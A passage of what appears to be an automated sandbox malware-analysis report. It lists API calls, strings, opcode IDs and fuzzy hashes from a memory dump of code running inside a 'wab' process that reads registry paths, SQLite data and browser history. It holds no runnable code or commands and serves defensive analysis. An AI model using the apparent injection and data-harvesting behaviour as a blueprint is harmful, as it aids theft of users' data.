                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              APIs
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              APIs
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                              Similarity
                                                              • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              APIs
                                                              • memset.MSVCRT ref: 004185FC
                                                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                              Similarity
                                                              • API ID: ??3@AttributesFilememset
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                              Similarity
                                                              • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                              Strings
                                                              Similarity
                                                              • API ID: PathTemp$??3@
                                                              • String ID: %s\etilqs_$etilqs_
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0041477F
                                                              • wcscpy.MSVCRT ref: 0041479A
                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                              Strings
                                                              Similarity
                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                              • String ID: General
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              Strings
                                                              Similarity
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                              Similarity
                                                              • API ID: ??3@
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$??3@
                                                              • String ID: g4@
                                                              • API String ID: 3314356048-2133833424
                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT ref: 0042EC7A
                                                              Strings
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
